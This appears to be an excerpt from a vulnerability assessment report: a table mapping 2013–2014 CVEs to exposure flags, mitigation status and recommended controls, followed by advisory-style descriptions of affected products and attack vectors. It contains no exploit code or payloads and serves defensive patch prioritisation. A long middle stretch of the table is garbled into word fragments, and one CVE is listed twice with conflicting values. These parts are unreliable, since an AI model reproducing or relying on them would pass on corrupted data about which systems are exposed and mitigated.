| CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware |
| CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management |
| CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don’t Install) |
| CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall |
| CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware |
| CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (no JS) |
| CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration |
| CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration |
| CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration |
| CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall |
| CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie-deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls (include anti-DOS) |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated | Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated | Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated | Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DOS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DOS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated | Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall, Anti-DOS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DOS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | | |
ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-6

48

7n

ny

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-7

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21, HP 3COM routers and switches, and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

